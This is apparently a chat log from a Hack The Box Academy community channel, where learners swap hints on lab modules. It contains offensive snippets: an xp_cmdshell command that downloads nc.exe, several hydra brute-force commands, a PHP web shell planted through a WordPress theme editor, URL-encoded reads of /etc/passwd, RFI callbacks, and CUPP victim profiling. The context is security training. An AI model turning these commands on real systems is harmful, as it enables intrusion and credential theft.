#modules
New module password attacks is very interesting, but ssh service is very long to brute-force (password mutation)
Used given wordlist in resources
same for another service in the same machine
could anyone give me a nudge on where i can find the ldap password for windows priv esc - skills assessment 1?
do you have to restart your vpn every time you jump over to a new box?
so ive been doing the getting started and im on the privilege escalation part i can write to moniter.sh but i keep getting error messages when i go to execute it with sudo would someone help me out cause ive tried to trouble shoot this for a long af time now and even found some videos where they are doing the exact same thing but it just works
I got you bruh
@half temple feel free to DM me
is anyone on who can help me with linux priv esc skills assessment 1
Did you let it run until success? I give up past 45min
Has anybody completed the Shells/Payload module on Htb Academy?
@urban valley I have, but I only took notes on maybe the first half
Anyone finish the wordpress module?
@west canopy or @rustic sage you guys have wordpress notes?
On the password mutation seems to be another service to bruteforce before ssh (with enumeration i have found some users) but the mutated wordlist is very big
hi i just finished network enumeration with nmap but i dont fully understand a part of it
if anyone can help explain it to me that would be great
i can privately send you the question as to not spoil the module for other people
thank you!
Hi everyone i'm doing shells & payloads and I finished all modules and all final skills assessment except the 2nd host regarding 50064.rb exploit i'm trying to export that exploit into metasploit but I need root permissions and I don't know if we can import without being root
Hi !
Do you know how long it takes to do the Bug Bounty Hunter module ?
it depends, but I guess 1 week would be enough
yeah?
Are you in the pwn box?
The credentials are stored on the desktop.
hi
Ok, thank you
I have notes for wordpress
Does it happen to someone else that they cannot install crackmapexec in the new module of PASSWORD ATTACKS, section --> Network Services ?
Yup. Just
pip3 install crackmapexec
and be done with it.
I agree!
doesn't work
I have read all the official github documentation and it does not work, the machines must be covered
Github? Don't git clone from github. I'd just install the Python module with pip3.
Post a screenshot of what you tried.
i also tried that
Hello, everyone. Is there a good module in HTB that allows me to study gobuster?
Or is there a simple module that allows you to use gobuster so that you can learn it? Thanks everyone!!
With that it works I had put pipx install crackmapexec instead of pip3 install crackmapexec. I had not realized that x was the version, that happened to me for copypaste
You will use gobuster quite a bit in the getting started module, the Shells and Payloads module, Using Web Proxies, and Information Gathering - Web Edition
Hey
@livid pier Yep I have wordpress notes
Thank you @west canopy and @lethal atlas
I definitely think it will take longer than a week tbh
Module--> PASSWORD ATTACKS
Section--> Network Services
I can only connect to the WinRM service with user:john password:november , the others won't let me. And I have used the command--> xfreerdp /v:<target-IP> /u:<username> /p:<password>
for each service another user is needed for access and another password . john isn't allowed, for rdp,..
The problem is that it takes a long time to get the passwords, more than 30 min
I have used username.list and password.list files inside PW-Attacks.zip
||after winrm, you can see which accounts are in the system and reduce the list||
thanks ill tried it
password mutation is very long (multiples steps)
Doesn't work
|| Administrator
cassie
chris
dennis
jerome
Public || These are the users but no password found
You must use wordlists from SecLists (like 500 worst passwords)
Module is too long to try bruteforce all services
I know
Yes its a crazy
Is sad :/
dm?
ok
@rustic sage27 Can I DM you too?
sure
Maybe it would be good to include a hint that tells you something related to rockyou.txt, in case people get stuck
do you like linux?
comedy "mac" option
Mac is based on Unix so it is decent
But linux is still better
@velvet sparrow Wish i could help brother but I have not started that module yet
just finished the Pandora machine on the main website. took me 4 hours lol. i feel so frustrated and relieved.
and i leveled up to a script kiddie
Nice work dawg!
Hello, can someone help me with module SHELLS & PAYLOADS on Automating Payloads & Delivery with Metasploit. I can't seem to find the right exploit and gain access to the machine. I feel like i have tried all SMB exploits but can't figure out if i'm doing something wrong or not just overlooking something.
@dry girder I checked my notes and I was able to use the windows/smb/psexec exploit to complete the section.
Also I had to set smbuser and smbpass in the options
When I use psexec I timeout for some reason and i have set correctly my options
Hmm... maybe try respawning the target if you haven't already?
I restarted both the target and workstation and got nothing, but I searched on google and I wrote LHOST to be tun0 and it worked
We should work together to get to hacker lol
@dry girder Nice! Yes the LHOST will typically always be the IP address for your Tun0 interface
Thank you @west canopy gonna keep this in mind if I see this thing happening again.
if you are still having trouble with this, let me know
@west canopy Do you use cherrytree for notes?
I need to start taking more notes, and I was wondering what I should use.
When i work on live boxes I use cherry Tree. For academy modules i just make a google doc and use Windows Snipping Tool for screenshots
I'm not sure , don't think so but i could be wrong
i don't think it works like OneNote or anything like that
You can save cherrytree as xml. I have decided to upload it to my repo.
I am going to try to take more notes.
We will see how it goes. 
i use notion, its pretty good and its free
cant be bothered to spend money unless its games xd
Intro to network traffic analysis
- Interrogating Network Traffic With Capture and Display Filters
Should it be a file "TCPDump-lab-2.zip" to download? I didn't find any file on that page
Hi there!
I think that the "Packet Inception, Dissecting Network Traffic With Wireshark" lab of the HTB Academy module "Intro to Network Traffic Analysis" is broken! When sniffing on 10.129.43.4, there are no jfif files on HTTP, there's just a "flat.jpeg" file on FTP. So, I can wait and wait and wait, no HTTP JPG files. Thus, I cannot answer the question "What was the filename of the image that contained a certain Transformer Leader? (name.filetype)" with hint "You should have seen three image files pulled in the traffic. water.jpg, htb.jpeg, and ..?". Has anybody similar problems?
can someone help me with Password Attacks Lab - Medium I found the user j......... and the pass but when I try SSH with the user it won't connect
Hello
Im trying to pwn the ARCHETYPE machine in Tier 1 of HTB
I managed to connect to the SQL server and configure the xp_cmdshell
I printed working directory to see if it was working, and it did
But I keep having issues when I run this particular command: xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://{MY_IP}/nc.exe/nc64.exe -outfile nc64.exe"
I keep getting an error saying no such command as wget
How do I fix this?
What section?
Password Attacks Lab - Medium
Skills Assessment ----> Password Attacks Lab - Medium
@shadow mist Try checking under the "Resources" section of the module
Password Attacks - Mutation section...drawing a blank...any hints?
Ignore that...I literally just found what I need...but it took an hour...
@rustic sage Try using the Wireshark-lab-2.pcap file provided under Resources. You should be able to find the solution by exporting objects from the pcap.
@patent maple I think wget in powershell is an alias and might not be a native command. Maybe try using "Invoke-WebRequest"
You cannot sync with cherry tree although I wish you could.
look at the token that is generated.
Then write a script that creates tokens in the same style and bruteforce the web application with it.
Take a look at Obsidian. I really like using Obsidian for my notes.
Need some help with the XSS skills assessment.
One thing I am having trouble in with this module is that I am confused how to find XSS vulnerabilities.
I don't know if I should be using tools, doing code review or just brute forcing different payloads until one works.
@raven cairn you are basically just re-doing what you did in the Session Hijacking portion. Using different payload formats to find out which parameter is vulnerable
Thanks. I will try hard to finish this question, and if I am having trouble I will come back
@west canopy My flag is not working (or i might be wrong). Can i dm to double check if U have the right cookie?
sure
Hi, can someone help me with the "Username Brute Force" section of the Login Brute Forcing module? The question is "Try running the same exercise on the question from the previous section, to learn how to brute force for users." Can't seem to get it to work
Ayoooo thanks Jared.
@urban valley The answer is the same as the question on the previous section. Just instead of using a Combined Credentials Wordlist, you will supply the password and then use a wordlist for Usernames.
@fast timber Notice how you can either Copy or Move a file to the TMP directory. The injection point is related to that
WOW I got it but absolutely dumb question. The answer was literally in the question but I kept thinking I needed new credentials. thank you though!
Could you also give me a hint/tip for Skill Assessment- Service Login Part 2? " Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag." I got into the SSH and I'm trying to brute force ftp into the other user. But I don't know if im using the correct port. I'm using the given syntax they gave: netstat -antp | grep -i, to find my ports on the ssh server
@urban valley You will want to run Hydra from inside the target. There should be a certain rockyou.txt file there. Try running hydra against the loopback IP address
Tried to brute force using the loopback: 127.0.0.1, didnt work
@urban valley DM me
Module: Footprinting
Task: Lab -Easy
Question: How can i copy generated rsa keys to server?
i haven't done that but start a python server and use curl or wget
might work
@stark tapir the command from within the ftp server would be something like: get id_rsa (this will transfer the key from the ftp server to your machine)
hello bro, thx will try )
hoo sorry it is from ftp
how do you enumerate the users ? i brute force all services but can not get anything
@onyx wasp your bottom screenshot should be correct. Maybe try refreshing the page?
okiee
nothing happened still same problem
lol i get the solution
I am stuck on
Hybrid Mode
Would be happy to get some help
In PASSWORD ATTACKS - Password Mutations, is it normal to spend more than two hours on the assessment?
Anyone available for a nudge on getting Drupalgeddon3 to work on the Attacking Common CMS module?
It took me an hour to get one ssh user yesterday...looking for another now for over an hour...I think it's all about getting an optimum mutated password list to try and reduce the time...and enumerating to ensure you have a small number of real users that exist on the box...
That's what I am actually trying to do. The exercise statement is a bit misleading, though (it doesn't mention you have to reduce, it kinda takes it for granted).
Yeah i found that...enumerate more (with techniques NOT in the Password Attacks module)...there is only a very limited number of users on there, and there's a password policy, which should allow you to reduce the size of the lists considerably...
Thanks for the hint. Still stuck, but made some progress.. gonna try again later today.
Hello! I am working through the Network Enumeration with NMAP module on the Firewall and IDS/IPS Evasion - Medium Lab section. I cannot get the DNS server version, can someone help me please?
@regal sierra DM me if you still need help
@jaunty patrol feel free to DM me as well

Can someone help with this question for File Inclusion?
Can't read /usr/share/flags/flag.txt for some reason
@late beacon I just tested on my end, I'm not able to read the flag either
Damn that sucks. @blissful verge can you help out with this?
Did you complete this module already?
Yep, I have screenshots in my notes for what I did to solve each section. Tried to recreate them and could not get the flag. I was able to read /etc/passwd though.
Must be some new changes that broke this section of it. I was able to read /etc/passwd as well. Perhaps you could DM me the flag value? I know how to get it, it's just not working.
Any clue for Module--> PASSWORD ATTACKS
Section--> Credential Hunting in Linux
This whole module is broken
Can anybody help me with the third question from OSINT module, section Active Subdomain Enumeration ???
Has anybody done Secure Sessions skills assessment? I'm really not sure what I'm supposed to be doing. The API endpoint looks to be vulnerable to RFI, and a successful query shows "adminVistedTrue", but the auth-session cookie is the same as if I just log in to the site as a regular user.
anyone completed "Information Gathering - Web Edition" ? I'm stuck on the first question of the "Active Subdomain Enumeration:" section. When I enter "inalnefreight.htb" on hackertarget.com/zone-transfer/, I get "error check your api query"
Looks like the whole academy is broken rn
i had the same issue with the question yesterday though :/
Did you complete the File Inclusions module?
@urban valley try doing something like: dig axfr inlanefreight.htb @ipaddress
I did but I do not remember how I got that flag you are asking for
thank you!
Hello guys i'm on Linux File Transfer Methods , trying to download the flag.txt file with python but i get connection refused even the url(port 80) is 403 Forbidden ,can anyone help ?
@frigid quail Can you send a screenshot so I can see what's happening?
@late beacon hey daniel i remember now how to get that flag, can you DM me
Okay I will try this
Thanks
can someone help me with 'web request' HTTP method GET section its literally the beginner module but I need assistance
@rustic sage DM me
Looking for help on the Bash Scripting Module. Has anyone who is online finished it?
There were some issues with the docker images but have now been fixed
Trying to figure out if the problem I am having with the solution to the "Comparison Operators" section's final question lay in my script or if it is in my understanding of what is being requested in the first place.
Working on Other PHP Wrappers and getting commands to run but cant figure out the question. It literally says "Submit the contents of the flag.txt file located in the /secrets directory" That looks like it is asking for the secret directory in the root directory which does not seem to exist. Anyone know what I am missing been trying to find a flag.txt file to no avail
As mentioned above, issue was just fixed. Check again
So I should restart the target then?
No.. the question has been clarified
I had seen that flag earlier and tried to submit it multiple times and it did not work
That was the issue.. it's fixed now
Thanks, I appreciate it.
Hey guys - encountered a problem with proxychains, any advice? it says invalid item in proxylist section: https 127.0.0.1 8080
Here is a screenshot of what I'm getting
@rustic sage You awake? I might need some help lol.
Login Brute forcing, username brute force
I have trouble understanding instructions
It's the same answer as the previous section but instead of using -C with a combination user:pass wordlist, you will do -L for a username list and -p with a password
so it would be something like: hydra -L /opt/useful/SecLists/Usernames/Names/usernames.txt -p admin -u -f 178.35.49.134 -s 32901 http-get /
Ok ok let me try this out. I understand how to use Hydra but understanding instructions. I'll let you know how it goes.
Also how you doin Vivi and Jared? : D
I can't figure out what to do on this Session Security Skills Assessment so my jimmies are a bit rustled
If I did that section I would help you out
One day I will have enough modules under my belt to do so
Thank you guys.
Was finally able to solve it.
@frozen sentinel let me know if you still need help with Attacking Common Applications. I don't recall using that exploit specifically but I can check my notes
just started the skills assessment hopefully I can help soon
Carry me Vivi ❤️
can someone help me with PASSWORD ATTACKS module Skills Assessment I'm struggling for 3 days on this, the module is design to struggling not to learn about Password Attacks
Login brute forcing - Section log in attacks. I am confused what is wrong with my command.
hydra -l admin -P home/rockyou.txt -f 178.62.21.52 -s 32381 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
I have the right ip and port. Am I not supposed to use rockyou???
@raven cairn rockyou should work through out this whole module. Your command looks right
Hmmmmm It's not working. I am connected to the vpn and the ip/port looks right
Service Login right?
@west canopy is the submit-solution page supposed to be broken?
@livid pier No it looks like it's an API endpoint
but vulnerable to RFI. Like if you have a netcat listener running you can make it connect to you
@raven cairn maybe the docker target didn't spawn properly?
submit-solution page by itself
submit-solution page trying to reach "evil.txt" file hosted on my machine
I tried using wireshark to sniff packets, I can get an auth-session cookie but it's identical to the cookie I get when I just navigate to the login page
I don't mean to interrupt but Hydra is being weird. Here is my error on Kali. I am trying to do this on my pwnbox but it is taking forever. I wonder if resetting the docker target might work? I've heard there have been some docker issues today.
Its your chat too
hi guyss
hi
Sup @stoic turtle
i lowkey dont know how to hack or anything about code,Do i learn here??
Wondering what my next course of action should be....
This is what I get on the pwnbox
lol no
Im toying with the idea of getting a shell
@raven cairn just tested on my end with my Kali VM , i was able to crack the password in a few seconds
Weird!? Did you use the same commands that I did?
yep
The sad emoji definitely hits home
I feel like it does hit my core
Hello!
Module: Footprint
Task: Medium Lab
Question: can't find any way to go into server. I need credentials for every service. Any nudge?
yes
you nmap udp?
nmap-ed udp yes 2 open ports
111/udp open rpcbind
2049/udp open nfs
I was able to get in, but now I get this when I log into the admin portal.
@stark tapir try mounting the NFS share and enumerate the files inside of it to find credentials
Resetting the machines worked : D
@raven cairn that almost looks like its a network or firewall issue on your end
This is the way, i prematured
i tried and it doesnt work, it writes incorrect credentials when i try to list files in mounted files. Or should i mount it through UDP?
just regular mount, if you follow the steps in the NFS section you should be able to mount the NFS share. There are a ton of .txt files inside
ls -la
total 64
drwxr-xr-x 1 pc pc 6 мар 24 10:14 .
drwxr-xr-x 1 pc pc 220 мар 24 12:54 ..
drwx------ 2 nobody 4294967294 65536 ноя 11 03:09 nfs
cd nfs
bash: cd: nfs: Permission denied
SUDO
ahahah
thx bro! you saved me again!
alright boys i'm gonna crash, see ya'll later!
Lol I think I am having issues with the docker targets but I'm not sure.
And this is on the pwnbox
It's extremely frustrating when you do everything right on your end and you can't get the flag
Especially when you are new and questioning if you are doing the right thing
Its one thing for something to not work and know it should be working
Its another when you are like oh i guess i was wrong
I guess I will try something else
then waste 2 days trying other things when the first thing you tried and failed was actually the answer
@mortal basin Are the issues I am experiencing possibly on HTB's end?
Specifically not being able to get to the login page.
The other errors were probably problems on my end, but I don't see why I keep getting timed out when I try to connect to the machine's login page on the pwnbox
Nothing of the sort has been reported. If you are having difficulty logging in try contacting the help team
Hello everyone, I am currently doing "Windows Fundamentals" HTB Academy. Can anyone help me with some of the steps? I would like to understand this. It's about shared folders, basic NTFS and creating users.
My actual task: "User must change password at logon"
I found out that I was for it:
Set-ADUser -Identity <samAccountName> -ChangePasswordAtLogon $true.
Then I get this error message:
I don't know what to do here =/
@here as you may have guessed from the discussion above, the File Inclusion module is due for an update, so it will be taken down for ~30 minutes..
will let you know once it's updated
Try creating the user using Computer Management.
@here File Inclusion module update released, with 4x the content and several new sections and exercises..
anyone who has previously completed the module is strongly recommended to go through it again
#!/bin/bash
var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"
for i in {1..40}
do
    var=$(echo $var | base64)
    if [[ $var == $value ]] && [ ${#var} -ge 113469 ] ;
    then
        echo $var | tail -c 20
    else
        echo "Not Found"
    fi
done
Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,469 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.
what do
@vernal dagger Try
-eq 113469
Ok, try:
||if [[ "$var" =~ "$value" && ${#var} -eq 113469 ]]||
Welcome
Checks for substring
@vernal dagger If you are interested https://linuxhint.com/equal-tilde-bash/
Hello, I have a strange question. Are you not able to use the HTB vpn (non-subscriber status at the moment) to connect to use your own Kali or Parrot OS to complete the module questions? The reason I am asking is nmap never works (other tools do work) - example sudo nmap -sC -sV 165.227.238.95:32236 which returns no target provided?
@kindred prism You don't specify ports in Nmap like that. Try:
nmap -sC -sV -p 32235 165.227.238.95
Thanks, unfortunately no go. I have reset the target with no success: sudo nmap -sC -sV -p 30383 178.128.163.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-25 08:20 MDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.33 seconds
try adding -Pn as the error suggests.
"Blacklist Filter" section of the File Uploads module has a problem that isn't working for me. Even when I upload a file that has an allowed extension I cannot execute code on the backend server
Would appreciate if someone can test this out
Tried that but it gives me an Error #485 with "your port specifications are illegal"
sudo nmap -sC -sV -p 30383 178.128.163.152 will only scan port 30383 if you want to scan the whole system you need to use sudo nmap -sC -sV -p- -Pn 178.128.163.152
hit me up in DM and I will assist you with it.
Can anybody help me with the third question from OSINT module, section Active Subdomain Enumeration ???
Some help i have the hash || $y$j9T$Xu.Vo5nnA8DZZ.getcrCR.$SkF9OfpfuRNy7nim2hXCwRj/99pWRVsRPEbqntEdU83 || from the root but i cant crack it
What module? OSINT or Information Gathering?
I havent done that module sorry.
I hear some of the hashes take forever to crack though
What is the hash type of this?
Yes, it is noted that it is a new module
hashid "$y$j9T$Xu.Vo5nnA8DZZ.getcrCR.$SkF9OfpfuRNy7nim2hXCwRj/99pWRVsRPEbqntEdU83" -e
Analyzing '.Vo5nnA8DZZ.getcrCR./99pWRVsRPEbqntEdU83'
[+] BigCrypt
Thanks. No go. I have reviewed the section, but can't complete the question. Thanks for the help anyway.
Sorry bud, I mean information gathering. The third question from the Active Subdomain Enumeration section
I thought so. I have helped on this one many times.
3rd question? DM me
? And for crack it with hashcat 🤨
I dont know. Honestly I don't think I have ever cracked a root password. Users yes, root no.
DM me.
Hi, when i ssh to the given address, the password i feel is not recognized. Any help with the ssh command please?
What section/question? what info are you logging in with? what command are you using?
Hello everyone, I would like your assistance in something simple. I'm taking the HTB academy, and in the topic of "Active Infrastructure Identification" for the information, it is asking the question "Which CMS is used on app.inlanefreight.local?" I've been trying to find the solution, and I have whatweb, but I'm not sure how to find it
INFORMATION GATHERING - WEB EDITION
Did you nmap it?
include the !
hi! im on linux fundamentals. Can someone help me if in there is in the machine the service that request me? I'm in services a process management and they want to use systemctl to find the service with the help of grep command if its necessary but i think it doesn't exist in the machine because nothing match it except one similar service but not the correct
ssh ip address
ssh user@ip ?
Ill give it a try , thanks bro
SSH to 10.129.146.57 with user "htb-student" and password "HTB_@cademy_stdnt!". The password is not recognized
after http generator
Thank you. I'll try this tomorrow. My session is over for today
Get kali and never run out of session time again
OK has anyone actually succeeded on the Password Attacks Module...mutation section challenge and got the correct flag?
you included the !?
Guys any help in the new password attacks module?
Hey i need help me
whats up?
@west canopy Still stuck?
Yep
lol me too
I moved onto the updated LFI module haha
An issue affecting the answer submissions in Password Attacks Skills Assessments has been fixed. If you were experiencing issues with this, please test this on your end and let us know the result.
@west canopy
On "hacking wordpress" module for the RCE via Theme Editor section, I added a web shell via the theme editor (system($_GET['cmd'];) but when I go to my append URL (
http://139.59.174.208:32653/wp-content/themes/twentyseventeen/404.php?cmd=id) i get this error: Fatal error: Uncaught Error: Call to undefined function get_header() in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php:14 Stack trace: #0 {main} thrown in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php on line 14
<?php ?> have you added that part @urban valley
@urban valley does your template look like this?
Can someone help me in a module?
Possibly, what's up?
I'm at the new password attack module. Stuck on trying to find the pass for the winrm user I found
Ah shoot. I haven't started that module yet
Lol running with different pass lists with no success
yep
What happens if you use curl?
i got a list of directories. if I wanted to enter it do I add the directory I want to enter after the cmd=ls or after the twentyseven? ex: "http://139.59.174.208:32653/wp-content/themes/twentyseventeen/404.php?cmd=ls/README.txt" or "http://139.59.174.208:32653/wp-content/themes/twentyseventeen/README.txt/404.php?cmd=ls"
you would want to url encode the entire command
cmd=<encoded command>
404.php?cmd=<encoded command>
so like 404.php?cmd=<README.txt> ?
well the command would be: cat README.txt
so you would url encode that
if you wanted to cat /etc/passwd it would look like: cat%20%2Fetc%2Fpasswd
yo wassup you guys
I'm in knowledge check section of getting started module and i've gotten user.txt which is the first task
but now i need to escalate privilege to do the second task and I don't know a way I can do so in meterpreter because most commands aren't working while in meterpreter
so if one of you could maybe be give me a hint on what i'm supposed to do
i'd appreciate it
pls
if you type "shell" into meterpreter it will drop you into a regular system shell
i pretty much always do this because I am not super proficient with meterpreter's commands
For the Priv Esc --- try using the ly4k PwnKit from github
Sorry I'm brand new and trying to figure everything out. What am I missing here?
Has it? The flag that I've found that has worked for someone else is still failing for me
I used ftp-betterdefaultpasslist
Uggg. The login-brute forcing module is being so weird to me.
Login Brute Forcing: Service Authentication Brute forcing ;
I don't see why my command is wrong
hydra -l b.gates -P /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -u -f ssh://178.128.163.152:32703 -t 4
I also tried using rockyou.txt and rockyou-10.txt and those wordlists didn't work for me either
I always get stuck in these stupid little ruts, even if I completely understand the concepts.
That is a good idea. I will try that and I will report back with my findings.
@kind turret is correct, that password list was for a previous question. for this question you need to create a username list and a password list.
So for the username I shouldn't use b.gates ?
I believe when I first completed the module it did not give you the b.gates. So you can skip the username generator part for this question
but you do have to use cupp to make a password list.
Ironically I am stuck on the Default Credentials section of Broken Authentication. Cant find a form name and get an error with the python file.
Well, got the python file to run. Progress.
It's been taking me a while to crack the password still....
did you create a password list file using cupp?
I used username anarchy to generate username wordlists so that might be what I am doing wrong?
Yes
Just did
$ cupp -i
cupp.py! # Common
\ # User
\ ,, # Passwords
\ (oo)____ # Profiler
() )
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked!
First Name: William
Surname: Gates
Nickname: Bill
Birthdate (DDMMYYYY): 28101955
Partners) name: Melinda
Partners) nickname: Ann
Partners) birthdate (DDMMYYYY): 15081964
Child's name: Jennifer
Child's nickname: Jenn
Child's birthdate (DDMMYYYY): 26041996
Pet's name: Nila
Company name: Microsoft
Do you want to add some key words about the victim? Y/[N]: Phoebe,Rory
Do you want to add special chars at the end of words? Y/[N]: y
Do you want to add some random numbers at the end of words? Y/[N]:y
Leet mode? (i.e. leet = 1337) Y/[N]: y
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to william.txt, counting 43368 words.
[+] Now load your pistolero with william.txt and shoot! Good luck!
And as a result, we get our personalized password wordlist saved as william.txt.
I was able to get the password.
nice.
Forgot to do this:
sed -ri '/^.{,7}$/d' william.txt # remove shorter than 8
sed -ri '/[!-/:-@[-`{-~]+/!d' william.txt # remove no special chars
sed -ri '/[0-9]+/!d' william.txt # remove no numbers
yeah that makes a difference.
Hey yall. If anyone has completed the Bash Scripting Module, I have kind of hit a wall and could use some help. Feel free to DM me, if the shoe fits.
I have the password. But I can't ssh into the machine for the life of me
It won't ask me to input the password
I will try it on my end
I just contacted HTB support and they have not answered me and I have been waiting for a bit
Much appreciated
Yep. No luck with Sudo. and HTB support team has not answered me for ~25 minutes.
ill try it from pwnbox too
one sec
@raven cairn This might sound silly but maybe try restarting your router? The other day you were having some weird issues that looked to be network or firewall related
Honestly tho. I might. I have been stuck on this ONE problem for about 3 hours now.

Anyone able to give me a nudge on File Inclusion "Basic Bypasses" ? I've tried combining several techniques but none have been successful
Edit: Solved!
I'm going through web proxies and I installed zap and they are asking me to hit the hud button, but the hud never shows?
@ashen orbit In order to see the HUD i had to use Zap's built in browser
I'm using it, keep refreshing but nothing happens
Anybody think they can help me out with the web request module, GET section question?
@jolly sonnet you will want to curl the target using "search.php?search=flag" as part of the URL, along with the Auth token you got from logging in as admin:admin
I havent gotten to that point yet, I'm trying to observe the backend response between the target server and whatever site its getting its info from using the network tab, but the php request on the backend wont show like it does in the module example
This is the example given, everytime I type anything into the search engine located on the target machine, it repeats the initial connection request sequence (http://admin:admin@<ip-address>:<port-num>/)
Seems to be OK on my end. I did a search for "Leeds" and I see the GET request pop up when viewing the requests under "Network".
Weird. How are you accessing the HTB academy platform? I'm just doing it through chrome on my host OS, should I be doing it another way perhaps?
That could definitely be it, they are using firefox in all of the examples. I am using a Kali Linux VM with Firefox.
okay awesome that will probably fix it. I'll start doing it in my kali vm from now on, thanks!
Fuck it not using the hud
@ashen orbit might be a dumb question but do you have the HUD turned on? It's the icon in the top right , next to the firefox icon
Yeah, its on, you have an older version than me, maybe thats the issue, I'm on 2.11.1
If this is for the ZAP scanner section , I was able to complete it without using the HUD
Fyi I was able to fix my issues. Patience is key. I am going to finish the pentesting path eventually.
I always say I'm going to spend two hours practicing, then play video games, but then it turns into all night
@raven cairn were you able to SSH? what was the issue?
I was able to ssh into the machine. I simply got a good rest and waited for a couple hours and tried again. I'm not 100% sure of the issue but here is my best guess. Hydra tends to be a very very noisy tool. I think my firewall was just very angry at me.
Good job!!!
good job bruh
Hello
I use kali with remote desktop connection from windows using xrdp wsl2. I have ubuntu on windows do I need to download ubuntu on kali again?
hello
any idea on how to get sudo access to a pwnbox in academy?
i was trying to follow along on the xss course and i need to start a listening server on a port (either netscan or a php server), but i need sudo access to start it
On your desktop you will see a document that puts credentials.txt and there is the password for sudo
oh, ok, thanks
Did anybody finish the xss module recently? i may have an issue and I do not know how to fix it
Dont want the answer, on the "Getting Started : Knowledge Check"
I've random guessed the login 1st try but have been stuck for about 3 hours now trying to figure out a way to exploit this / move to where I need to go. I've used FFUF to find 5 diff extensions i can visit and have found a good amount of what seems to be relevant info from there.
Api Key / Username and Password as well as other stuff.
would like a little nudge /better understanding of what i'm possibly missing if possible.
I see an upload page that doesnt seem to load which is where i thought i'd be able kinda get access, but kinda flailing / stuck atm
was there another way i was supposed to get / find initial access? Other then guess a standard credential thing?
stuck on knowledge check bit of getting started on the part with
||using php to priv esc I know I need to use php I been on gtfobins I tried my own php code the server is running php 7.4.3 and just keeps echoing my commands||
||check the themes tab||
any hint BROKEN AUTHENTICATION skill
Hi, looking for some assistance with Getting Started --> Privilege Escalation --> second question requires privilege escalation to root but I can't seem to get it. I have tried various GTFOBins with no success.
I finished XSS module recently.
@low vine For foothold you can use a metasploit exploit against the GetSimple CMS being used by the Target
@kindred prism DM me if you still need help with the priv esc
@valid finch Feel free to DM me as well
I cracked it about an hour ago but thank you for the offer
RESOLVED (Thank you @unique valve ): I am getting discouraged using this platform for my cyber security journey. I am putting the right answer for modules and for some reason my answers are incorrect. Is there anyway I can share a screenshot to give an idea of what I am talking about?
Hello, I'm getting an error while doing the RDP in the windows fundamentals, I've followed all the instructions to do the modules from my own terminal but I'm getting an error while trying to connect to target in the RDP section, "errorconnect_connect_transportfailed"
NP. As you can see in the encircled area in the screenshot, these are the supported proxy formats.
I see, so my problem is https format not supported?
You need to specify the kind of server and not the protocol.
So, even for HTTPS, it would be an HTTP server.
You can google a bit "Socket vs HTTP" @idle cliff
Are you connecting from your own box or Pwnbox? Would you mind showing the command you are attempting to use when connecting via RDP ?
What is your question?
Ok cool thank you
Was this directed at me?
It wasnt. I was replying to professor101.
@rustic sage May i ask you a q regarding the Footprinting module in htbA--specifically the DNS section...its a dumb q but I cant figure it out!
Sorry, haven't done it yet.
ok
Does anybody know if I should be updating the subdomains.txt link w real time url?
anytime I try to run this it cant find file..
@compact compass Go to the directory where "Discovery" is under it.
It's pointing to GIT
You need to find all the zones.
There are DNS servers that allow zone transfer (dig axfr) from everyone and then there are DNS servers that allow zone transfer only from certain servers.
Hi, i'm on the "Web Enumeration" -> "Gobuster"
i follow the step, but i'm stuck.
it's what i have to do
And on my terminal, i've this error :
i don't find the problem :/
@cinder quarry you are missing the port number for the target
it's strange, in the example it's not there
with the port number, it works thanks
np!
@acoustic owl I've found all the zones...Cant figure out what im doing wrong!
Hello, I have a dumb question (searched but did not find anything), how do we get root on the pwnbox web machine? I do not have my user password so i can't do sudo and i do not have machine details like in HTB with my user password.
I need to be root or run sudo to edit my /etc/hosts or to use metasploit.
I use a free account on academy.
anyone have a hint for the broken authentication skills assessment?
||i found the cookie|| and was able to change it to ||support||, but it says that ||it can't have the requested role||
I commented here
@pallid fulcrum check the desktop, there should be a my_credentials.txt file
yea just found it on the htb pwnbox, i will check if it's there too on the academy pwnbox, thx ๐
NP, sorry I didn't see your message sooner
Did you solve it?
@dense hearth Hey pall, any meaningful hints to solving DNS enum? I've dig'd each address and tried many of the lists...unsure what im doing wrong
No
I think solve here i try
Yeah I experimented with the messaging feature and password reset but I haven't gotten any leads yet
Look he says , the new insite message function
@acoustic owl yooo
Yes I see, did you figure out how to exploit it?
Hello all,
I'm looking for someone who finished the "Intro to Assembly Language" module.
I have some questions about this question in the Skills Assessment chapter:
"Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'."
can someone help me out with the skill assessment for broken authentication?
i know you can ||enumerate users via the message panel but i haven't been able to find any valid ones||
Found this interesting, not sure why this is happening so I would appreciate if anyone could find the reason for this. I am working on the Introduction to Bash Scripting Module and the first Exercise wants to character count of the 35 generation base64 conversion. Using bash with the following methods; echo -n $var | wc -c OR echo -n $var | awk '{print length}' OR echo ${#var} all produce exactly a count of 1 less than the actual answer. Which I had to tee to a file for python to determine the length to answer the exercise question. ???
is there a way to copy/paste from kali to pwnbox and vice versa?
@urban valley I'm not able to copy/paste into pwnbox , it's definitely a pain
rip
If you log in to HTB Academy from any OS and spawn a Pwnbox instance, you should be able to use the clipboard feature in the bottom right corner of the Pwnbox VNC browser session to copy and paste input & output to & from Pwnbox.
Yes, You have to open the pwnbox in full-screen and you have a button feature for copy/paste
Ok my mind is blown. Thank you gentlemen
I'm connecting from my own box. The command I'm using is sudo xfreerdp /v:<IP_address_given> /u:<user_name> /p:<password>
